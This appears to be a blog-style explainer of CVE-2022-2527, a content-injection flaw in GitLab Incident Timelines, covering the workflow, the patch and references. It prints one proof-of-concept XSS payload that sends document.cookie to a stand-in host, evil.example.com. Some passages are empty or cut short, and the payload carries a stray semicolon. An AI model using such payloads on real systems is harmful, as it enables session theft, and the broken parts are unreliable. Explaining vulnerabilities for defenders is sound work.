CVE-2022-2527 - Arbitrary Content Injection in GitLab Incident Timelines – How it Worked, and Why it Mattered

In the world of version control and DevOps, GitLab is huge. It runs major codebases, automates processes, and tracks code incidents for thousands of companies. But even the best software can have bugs—and sometimes, those flaws can open doors for attackers.

CVE-2022-2527 is one such issue, found in GitLab’s “Incident Timelines” feature. In this article, we’ll take a deep dive into what happened, why it happened, and how an attacker could abuse it. We’ll also provide a simple code example to highlight the risk and link to original GitLab security references.

What is CVE-2022-2527?

CVE-2022-2527 is a vulnerability reported in GitLab CE/EE (Community and Enterprise Edition). It affects:

The core problem?

An authenticated attacker—meaning, any user with valid login—could inject arbitrary content into the Incident Timelines. When another user viewed this malicious content, it could trigger arbitrary web requests. This is a classic case of stored Cross-Site Scripting (XSS) leading to attacks like Cross-Site Request Forgery (CSRF) or phishing.

Understanding the Exploit

Scenario:  
Imagine an attacker who already has a GitLab account (even a guest or reporter). With the right permissions, they can add Timeline Events in an incident. If the timeline fields aren’t sanitized for code, a user viewing the incident timeline can be served malicious JavaScript or HTML.

1. Vulnerable Feature: Incident Timelines

Incident Timelines are part of GitLab’s incident management. Users can add detailed events while tracking outages, problems, or security incidents.

2. The Weakness

The problem came down to improper input validation. The timeline event allowed rich-text content—think comments, descriptions, and other user-supplied inputs—without fully cleaning out code that could lead to script injection.

3. Exploit Workflow

- Step 1: The attacker creates or edits a timeline event with malicious HTML/JavaScript.
- Step 2: Another legitimate user (like an SRE, manager, or dev) visits the incident timeline and views the infected event.
- Step 3: The browser runs the malicious code. This might send unauthorized requests, steal user info, or impersonate the victim.

Proof-of-Concept (PoC) Code Example

> Note: Use this PoC only in legal, controlled environments (e.g., a test server you own).

Let’s say the attacker wants to run code when a victim visits the timeline. They might insert the following as the Timeline event description:

<img src="x" onerror="fetch('https://evil.example.com/steal?cookie='; + document.cookie)">

This uses a broken image to trigger the onerror handler, which sends the user’s cookie to the attacker’s server. If GitLab doesn’t sanitize input, this JavaScript will run automatically.

Mitigation

Patch your GitLab!

15.3.2

Upgrade to these or newer versions immediately.  
See the official advisory:  
- GitLab Security Release: 15.3.2, 15.2.4, 15.1.6
- GitLab CVE-2022-2527 Details

How Did GitLab Fix It?

The fix involved sanitizing input and escaping or filtering out dangerous tags/attributes before rendering timeline events. This stopped scripts from running, even if attackers tried to sneak them in.

If you build custom integrations or UIs with GitLab data, make sure you sanitize ANY untrusted user input before displaying it.

Final Thoughts

CVE-2022-2527 is a reminder that even trusted, authenticated users shouldn’t be able to add arbitrary code to apps used by others. If you manage GitLab, always stay on top of security updates. If you write web apps, remember:

References

- GitLab Security Advisory – Incident Timeline Injection (CVE-2022-2527)
- National Vulnerability Database, CVE-2022-2527
- GitLab Release Notes

Timeline

Published on: 10/17/2022 16:15:00 UTC
Last modified on: 10/19/2022 18:10:00 UTC